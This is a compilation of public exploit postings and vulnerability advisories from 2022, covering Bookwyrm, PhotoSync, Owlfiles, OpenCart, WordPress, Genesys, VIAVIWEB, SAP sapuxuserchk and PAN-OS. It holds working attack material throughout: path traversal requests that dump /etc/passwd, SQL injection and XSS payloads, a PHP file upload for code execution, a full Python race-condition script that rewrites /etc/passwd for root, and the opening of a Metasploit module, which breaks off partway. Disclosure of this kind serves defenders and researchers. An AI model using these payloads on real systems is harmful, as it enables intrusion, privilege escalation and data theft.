<pre><code># Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass<br /># Date: 2022-08-4<br /># Exploit Author: Akshay Ravi<br /># Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm<br /># Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3<br /># Version: <= 4.0.3<br /># Tested on: MacOS Monterey<br /># CVE: CVE-2022-2651<br /># Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/<br /><br />Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection<br /><br /># Steps to reproduce:<br /><br />1. Create a acount with victims email id<br />2. When the account is created, its ask for email confirmation via validating OTP <br />Endpoint: https://site/confirm-email<br />3. Enter any random OTP and try to perfrom bruteforce attack and if otp matches, We can takeover that account<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/f72138e574743640bdcdb9f102dff0a5.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Dropper.Win32.Corty.10<br />Vulnerability: Insecure Credential Storage<br />Description: The malware stores its credentials in cleartext within the Windows registry.<br />Family: Corty<br />Type: PE32<br />MD5: f72138e574743640bdcdb9f102dff0a5<br />Vuln ID: MVID-2022-0639<br />Dropped files: TMP205880.EXE<br />Disclosure: 09/19/2022<br /><br />Exploit/PoC:<br />Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\UltraAccess Networks\NetBus Server\Telnet<br />Login\Admin<br />Password\1234<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: PhotoSync 4.7 IOS APP Local file inclusion<br /># Date: Sep 19, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.photosync-app.com/home.html<br /># Software Link:<br />https://apps.apple.com/us/app/photosync-transfer-photos/id415850124<br /># Version: 4.7<br /># Tested on: iPhone IOS 16.0<br /><br /><br />GET /../../../../../../../../../../../../../../../etc/passwd HTTP/1.1<br />Host: 192.168.8.101:8080<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)<br />AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e<br />Safari/8536.25<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br /><br />-------<br /><br />HTTP/1.1 200 OK<br />Date: Mon, 19 Sep 2022 06:35:11 GMT<br />Accept-Ranges: bytes<br />Content-Length: 2791<br /><br />##<br /># User Database<br />#<br /># This file is the authoritative user database.<br />##<br />nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false<br />root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh<br />mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh<br />daemon:*:1:1:System Services:/var/root:/usr/bin/false<br />_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false<br />_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false<br />_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false<br />_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false<br />_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false<br />_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false<br />_securityd:*:64:64:securityd:/var/empty:/usr/bin/false<br />_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false<br />_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false<br />_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false<br />_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false<br />_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false<br />_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false<br />_ondemand:*:249:249:On Demand Resource<br />Daemon:/var/db/ondemand:/usr/bin/false<br />_findmydevice:*:254:254:Find My Device<br />Daemon:/var/db/findmydevice:/usr/bin/false<br />_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false<br />_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false<br />_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false<br />_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false<br />_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false<br />_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false<br />_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false<br />_diskimagesiod:*:271:271:DiskImages IO<br />Daemon:/var/db/diskimagesiod:/usr/bin/false<br />_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false<br />_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false<br />_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false<br />_accessoryupdater:*:278:278:Accessory Update<br />Daemon:/var/db/accessoryupdater:/usr/bin/false<br />_knowledgegraphd:*:279:279:Knowledge Graph<br />Daemon:/var/db/knowledgegraphd:/usr/bin/false<br />_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false<br />_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false<br />_trustd:*:282:282:trustd:/var/empty:/usr/bin/false<br />_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false<br />_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false<br />_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false<br />_backboardd:*:287:287:BackBoard:/var/empty:/usr/bin/false<br />_avphidbridge:*:288:288:Apple Virtual Platform HID<br />Bridge:/var/empty:/usr/bin/false<br />_launchservices:*:290:290:Launch Services:/var/empty:/usr/bin/false<br /></code></pre>
<pre><code># Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities<br /># Date: Sep 19, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link:<br />https://apps.apple.com/us/app/owlfiles-file-manager/id510282524<br /># Version: 12.0.1<br /># Tested on: Ios 16.0<br /><br /><br /><br /><br />###########<br />path traversal on HTTP built-in server<br />###########<br /><br />GET /../../../../../../../../../../../../../../../System/ HTTP/1.1<br />Host: 192.168.8.101:8080<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)<br />AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e<br />Safari/8536.25<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />If-None-Match: 42638202/1663558201/177889085<br />If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT<br />Connection: close<br />Content-Length: 0<br /><br />-------<br />HTTP/1.1 200 OK<br />Cache-Control: max-age=3600, public<br />Content-Length: 317<br />Content-Type: text/html; charset=utf-8<br />Connection: Close<br />Server: GCDWebUploader<br />Date: Mon, 19 Sep 2022 05:01:11 GMT<br /><br /><!DOCTYPE html><br /><html><head><meta charset="utf-8"></head><body><br /><ul><br /><li><a href="Cryptexes/">Cryptexes/</a></li><br /><li><a href="DriverKit/">DriverKit/</a></li><br /><li><a href="Library/">Library/</a></li><br /><li><a href="Applications/">Applications/</a></li><br /><li><a href="Developer/">Developer/</a></li><br /></ul><br /></body></html><br /><br /><br />#############<br />LFI on HTTP built-in server<br />#############<br /><br />GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1<br />Host: 192.168.8.101:8080<br />Accept: application/json, text/javascript, */*; q=0.01<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)<br />AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e<br />Safari/8536.25<br />X-Requested-With: XMLHttpRequest<br />Referer: http://192.168.8.101:8080/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br /><br />----<br /><br />HTTP/1.1 200 OK<br />Connection: Close<br />Server: GCDWebUploader<br />Content-Type: application/octet-stream<br />Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT<br />Date: Mon, 19 Sep 2022 03:28:14 GMT<br />Content-Length: 213<br />Cache-Control: max-age=3600, public<br />Etag: 1152921500312187994/1662169021/0<br /><br />##<br /># Host Database<br />#<br /># localhost is used to configure the loopback interface<br /># when the system is booting. Do not change this entry.<br />##<br />127.0.0.1 localhost<br />255.255.255.255 broadcasthost<br />::1 localhost<br /><br /><br /><br />###############<br />path traversal on FTP built-in server<br />###############<br /><br />ftp> cd ../../../../../../../../../<br />250 OK. Current directory is /../../../../../../../../../<br />ftp> ls<br />200 PORT command successful.<br />150 Accepted data connection<br />total 10<br />drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr<br />drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin<br />drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin<br />drwxr-xr-x 0 root wheel 224 Jan 01 1970 System<br />drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library<br />drwxr-xr-x 0 root wheel 224 Jan 01 1970 private<br />drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev<br />drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications<br />drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer<br />drwxr-xr-x 0 root admin 64 Jan 01 1970 cores<br />WARNING! 10 bare linefeeds received in ASCII mode<br />File may not have transferred correctly.<br />226 Transfer complete.<br />ftp><br /><br />#############<br />XSS on HTTP built-in server<br />#############<br /><br />poc 1:<br /><br />http://192.168.8.101:8080/download?path=<script>alert(rose)</script><br /><br />poc 2:<br /><br />http://192.168.8.101:8080/list?path=<script>alert(rose)</script><br /></code></pre>
<pre><code># Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection<br /># Date: 18/09/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.opencart.com/<br /># Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added<br /># Version: v.4.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br />* Description :<br /><br />So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter 'email' in index.php?route=extension/module/so_newletter_custom_popup/newsletter. <br />Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.<br /><br /><br />* Steps to Reproduce :<br />- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter<br />- Save request in BurpSuite<br />- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs<br /><br /><br /><br />Request :<br /><br />===========<br /><br />POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1<br />Content-Type: application/x-www-form-urlencoded<br />Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate<br />Content-Length: 29<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0<br />Connection: Keep-alive<br /><br />createdate=2022-8-28%2019:4:6&email=hi&status=0<br /><br /><br />===========<br /><br />Output :<br /><br />Parameter: #1* ((custom) POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0<br /><br /><br /><br /></code></pre>
<pre><code># *Exploit Title*: WordPress Plugin ‘GetYourGuide Ticketing’ - Stored<br />Cross-Site Scripting<br /># Date: 18-09-2022<br /># Exploit Author: Mariam Tariq - HunterSherlock<br /># Vendor Homepage:<br />https://wordpress.org/plugins/search/GetYourGuide+Ticketing/<br /># Version: 1.0.1<br /># Tested on: Firefox<br /># Contact me: mariamtariq404@gmail.com<br /><br /># *Vulnerable code*:<br /><br />``` <input type="text" name="partner_hash" value="<?php echo $partner_hash<br />?>"></input> ```<br /><br /># *POC*:<br /><br />1- Install the plugin ‘GetYourGuide Ticketing’ & activate it.<br />2- Navigate toward the GYG-Ticketing<br />3- Enter the XSS payload ` “><img src=x onerror=alert(1)>`<br />4- Go to link builder to verify the XSS pop-up.<br /><br />#* POC image*:<br /><br />https://imgur.com/amrDhIt<br /></code></pre>
<pre><code>Product: Genesys PureConnect - Interaction Web Tools Chat Service<br />Description: Interaction Web Tools Chat Service allows XSS within the Printable Chat History via the participant -> name JSON POST parameter.<br />Vulnerability Type: XSS<br />Vendor of Product: Genesys PureConnect<br />Affected Product Code Base: Interaction Web Tools - Chat Service - Appears to be all versions up to current release<br />Affected Component: "Print" feature of the Interaction Web Tools Chat: https://help.genesys.com/pureconnect/mergedprojects/wh_tr/desktop/pdfs/web_tools_dg.pdf<br />Attack Vectors:<br /><br /> * To exploit the Cross-Site Scripting vulnerability, visit https://<vulnerable-domain>/I3Root/chatOrCallback.html<https://%3cvulnerable-domain%3e/I3Root/chatOrCallback.html><br /> * Then select the 'I don't have an account" option, and enter the name "><script>alert(1)</script><br /> * Then press 'Start Chat'<br /> * Then enter anything in the chat box like 'asdfg' and press send<br /> * Now select the 'Printable Chat History' in the top right corner<br /> * XSS will trigger. You can google dork for vulnerable versions with inurl:"/I3Root/chatOrCallback.html"<br /><br /><br />I'm assuming if an admin tries to print the chat conversation, it will trigger for them as well. Unable to confirm though.<br /><br />Discoverer: Jake Murphy - Echelon Risk + Cyber - https://echeloncyber.com/<br /><br />> [References]<br />> http://genesys.com<br />> http://interaction.com<br /><br /></code></pre>
<pre><code>```<br /># Exploit Title: [VIAVIWEB Wallpaper Admin - Multiple vulnrabilities]<br /># Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"<br /># Date: [18/09/2022]<br /># Exploit Author: [Edd13Mora]<br /># Vendor Homepage: [www.viaviweb.com]<br /># Version: [N/A]<br /># Tested on: [Windows 11 - Kali Linux]<br /><br />------------------<br />SQLI on the Login page<br />------------------<br />payload --> admin' or 1=1-- -<br />---<br />POC:<br />---<br />[1] Disable JavaScript on ur browser put the payload and submit<br />[2] Reactive JavaScript and resend the request<br />---------------------------<br />Authenticated SQL Injection:<br />---------------------------<br />Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]<br />-----------------------------------------------<br />Remote Code Execution (RCE none authenticated):<br />-----------------------------------------------<br />Poc:<br />----<br />Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes<br />--------------------<br />Burp Request :<br />--------------------<br /><br />POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2<br />Host: http://googlezik.freehostia.com<br />Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848<br />Content-Length: 467<br />Origin: http://googlezik.freehostia.com<br />Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />-----------------------------33893919268150571572221367848<br />Content-Disposition: form-data; name="category_id"<br /><br />1<br />-----------------------------33893919268150571572221367848<br />Content-Disposition: form-data; name="image[]"; filename="poc.php"<br />Content-Type: image/png<br /><br /><?php phpinfo(); ?><br />-----------------------------33893919268150571572221367848<br />Content-Disposition: form-data; name="submit"<br /><br /><br />-----------------------------33893919268150571572221367848--<br /><br /><br />Uploaded File can be found here :<br />--------------------------------<br />http://localhost/PAth-Where-Script-Installed/categories/<br />```<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220915-0 ><br />=======================================================================<br /> title: Local privilege escalation<br /> product: SAP® SAPControl Web Service Interface (sapuxuserchk)<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security note 3158619<br /> CVE number: CVE-2022-29614<br /> impact: medium<br /> homepage: https://www.sap.com/about.html<br /> found: 2022-02-24<br /> by: M. Li (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"The SAP Start Service (sapstartsrv) provides basic management services for<br />systems and instances and single server processes. Services include starting<br />and stopping, monitoring the current run-time state, reading logs, traces and<br />configuration files, executing commands and retrieving other<br />technology-specific information, like network access points, active sessions,<br />thread list etc. They are exposed by a SOAP Web service interface named<br />"SAPControl". This paper describes how to use this Web service interface."<br /><br />Source: https://assets.cdn.sap.com/sapcom/docs/2016/09/0a40e60d-8b7c-0010-82c7-eda71af511fa.pdf<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends to implement the security note 3158619, where the<br />documented issue is fixed according to the vendor. We advise installing the<br />corrections as a matter of priority to keep business-critical data secured.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Local privilege escalation (CVE-2022-29614)<br />The SUID-root program sapuxuserchk erroneously follows the symbolic link to<br />create a temporary local logon ticket and change the ownership of the target<br />file for owner access only. As member of the group sapsys, a user can therefore<br />escalate his/her privileges to root on a local Unix system by successfully<br />exploiting a race condition.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Local privilege escalation (CVE-2022-29614)<br />The utility sapuxuserchk is used by sapcontrol to request a temporary local<br />logon ticket in the following way. As a result, the ticket is created in the<br />folder /usr/sap/SEC/D00/work/sapcontrol_logon/<br /><br />$ sapcontrol -nr 0 -function RequestLogonFile user0<br /><br />$ ls -l logon*<br />-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0<br />-rw------- 1 user0 users 40 Feb 25 09:00 logon1<br />-rw------- 1 root root 40 Feb 25 09:01 logon2<br /><br /><br />Since sapcontrol is supposed to create the ticket for any system user, it<br />requires a utility with SUID bit set. The owner, group and its permission bits<br />of sapuxuserchk of a standard installation are shown below.<br /><br />$ ls -l sapuxuserchk<br />-rwsr-x--- 1 root sapsys 1312137 Feb 28 2019 sapuxuserchk<br /><br />The request originating from sapcontrol is first sent to the instance server<br />sapstartsrv, piping into sapuxuserchk a 512-byte encrypted message, which<br />contains the ticket path, user name and ticket in the plaintext, as an example<br />shown below.<br /><br />$ strings input-0-plaintext<br />SAPLOGONFILE /usr/sap/SEC/D00/work/sapcontrol_logon/logon1<br /> user0<br />1133146902252676394602837452470900726967<br /><br /><br />On its duty to create the ticket, sapuxuserchk performs the sanity check to<br />guarantee the non-existence of the file prior to the creation in the<br />function internal_create_saplogon_file.<br /><br />However, it introduces a race condition between the stat and open calls, as<br />shown by the following excerpt from strace.<br /><br />stat("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)<br />open("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3<br /> fchown(3, 1000, 100)<br /><br /><br />The attacker can run a race of constantly creating a symbolic link logon1<br />pointing to a privileged file such as /etc/passwd and meanwhile invoke the<br />SUID-root program sapuxuserchk, in the hope that the creation of the link<br />take place between the stat and open calls, so that the first will fail,<br />(meaning that the file does not exist yet) while the second as well as the<br />ensuing fchown call succeeds. In a positive result, the attacker gains the<br />read-write permission of the target file.<br /><br />The following run to winning the race took 629 attempts to finally gain the<br />root privilege. The PoC further below lists the exploit implementing the idea<br />above with a pre-intercepted message for user secadm.<br /><br />-------------------------------------------------------------------------<br />sh-4.3$ id<br />uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)<br /><br />sh-4.3$ ls -l /etc/passwd<br />-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd<br /><br />sh-4.3$ python3 sapmatt.py<br />this many tries: 629<br />[+] now login as sapmatt<br /><br />sh-4.3$ su sapmatt<br />Password:<br /><br />sh-4.3# id<br />uid=0(sapmatt) gid=0(root) groups=0(root)<br /><br />sh-4.3# ls -l /etc/passwd<br />-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwd<br /><br /><br />$ cat sapmatt.py<br />import sys, os, signal, base64, random, string<br /><br />secadm_msg = <br />b'O9OXlWwex4ddSI5vhXFfUQvZ8Td3NWzRNIb9QN6bHY764Z0zVNuVjFHRGhHEgYgwNQDnf0/bBwzlEXCSXFkhtiDqDohuyCxG4mtRqc86FlB6DTOjBY9o/6Cb3rRSZ58jggx71JXMRk21jW3gqdem+tmqHCnIumZjodk2cuk5/MY76dsD65s3j1XrQS0RT3gPaspl/6Yb842hbVTZXVRY3cHKzNq5tZMKB2LmyyslO4xCI00eBN6k6yEKNFLvMx8lYbAIaHcfdWu3pMWVIb9rT3BoTCHwi5hBz8dHk6usdEw05q/Xuxe28gxWCUZpN09sYsd/5R8HqqLfwyiNI7CTBCA3f+fHUweJPuteD5O8bwo/mEOShHimO1gPZzhBdow2C0JszYQeQpxgRtENXPUt2qgT7TJqmItxM0puB8ry0TnKJIbk5gj0smflBPBZyTDXl+qNUmgWL1dK/SBpTUErGMVXFVBi8bNDMSUhcJa+0IQlYSBHPln17kquqhGvlRYYZVJttDNoYcvBchc4HxHZmH5pHkD4fhbcQgFT0UFgceSH1j3sE6G/M/QM1X/vTVE4534XJ3mDcFk/brOYun1dawJ30BkJ9HbP5weihwRwspOq52qRZ9CXsnJCtFPNqNWNIe8BgQUW8WV7FkiDJ+Lpp0pq8KLlZ0Yomz46YfCHkag='<br /># openssl passwd sappass<br />u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"<br />logon_symlink = "/usr/sap/SEC/D00/work/sapcontrol_logon/logon1"<br />target_file = "/etc/passwd"<br /><br />g = 1024<br />if not os.path.isfile(logon_symlink):<br /> os.system("touch " + logon_symlink)<br />secadm_msg = base64.b64decode(secadm_msg)<br /><br />msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))<br />f0 = open(msg_file, "wb")<br />f0.write(secadm_msg)<br />f0.close()<br /><br />pid = os.fork()<br />if pid == 0:<br /> j = 0<br /> while True:<br /> if j > g:<br /> print('done')<br /> os._exit(os.EX_OK)<br /> j += 1<br /> os.system("/usr/sap/SEC/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))<br />else:<br /> i = 0<br /> uid = os.getuid()<br /> success = False<br /> while not success:<br /> if i > g:<br /> print("[-] give up, link too many tries: " + str(i))<br /> break<br /> i += 1<br /> try:<br /> os.unlink(logon_symlink)<br /> os.symlink(target_file, logon_symlink)<br /> statinfo = os.stat(target_file)<br /> if statinfo.st_uid == uid:<br /> os.kill(pid, signal.SIGILL)<br /> print("this many tries: " + str(i))<br /> print("[+] now login as sapmatt ")<br /> f = open(target_file, "w")<br /> f.write(u1_passwd)<br /> f.close()<br /> success = True<br /> except Exception as err:<br /> print('[-] lost the race {0}'.format(err))<br /> os.waitpid(pid, 0)<br /> os.unlink(msg_file)<br /><br />-------------------------------------------------------------------------<br /><br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version of the binary was found to be vulnerable during our tests:<br />* Version: 753, patch 400, changelist 1906766<br /><br />According to the vendor the following products are affected by the discovered<br />vulnerability:<br /><br />SAP NetWeaver AS ABAP, AS Java, ABAP Platform and HANA Database, Versions:<br />* KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88<br />* KRNL64NUC 7.22, 7.22EXT, 7.49<br />* KRNL64UC 7.22, 7.22EXT, 7.49, 7.53<br />* SAPHOSTAGENT 7.2<br /><br />Please refer to the vendor patch day post:<br />https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-02-25: Contacting vendor through vulnerability submission web form.<br />2022-03-04: Vendor confirms receipt and assigns SAP security incident number<br /> #2270008914.<br />2022-04-29: Requesting status update.<br />2022-05-05: Vendor confirms vulnerability and states it might be addressed<br /> in May 2022 patch day.<br />2022-06-14: Vendor releases patches with SAP security note 3158619.<br />2022-06-15: Requesting the confirmation of the security note on the issue.<br />2022-08-11: Vendor sends the link to the Acknowledgements to Security<br /> Researchers.<br />2022-09-02: Requesting the confirmation of the fix.<br />2022-09-03: Vendor confirms the issue has been fixed on June Patch Day.<br />2022-09-15: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The following security note needs to be implemented:<br />https://launchpad.support.sap.com/#/notes/3158619<br /><br /><br />Workaround:<br />-----------<br />You can remove the SUID-bit from sapuxuserchk as temporary mitigation.<br /><br /># chmod 0755 sapuxuserchk<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF M. Li / @2022<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> require 'ipaddr'<br /><br /> class InvalidRequest < StandardError<br /> end<br /><br /> class InvalidResponse < StandardError<br /> end<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Palo Alto Networks Authenticated Remote Code Execution',<br /> 'Description' => %q{<br /> An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated<br /> administrators to execute arbitrary OS commands with root privileges.<br /> This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10<br /> },<br /> 'Author' => [<br /> 'Mikhail Klyuchnikov', # Vulnerability discovery<br /> 'Nikita Abramov', # Vulnerability discovery<br /> 'UnD3sc0n0c1d0', # Exploit<br /> 'jheysel-r7' # msf module<br /> ],<br /> 'References' => [<br /> ['CVE', '2020-2038'],<br /> ['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],<br /> ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],<br /> ['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit<br /> ],<br /> 'DisclosureDate' => '2020-09-09',<br /> 'License' => MSF_LICENSE,<br /> 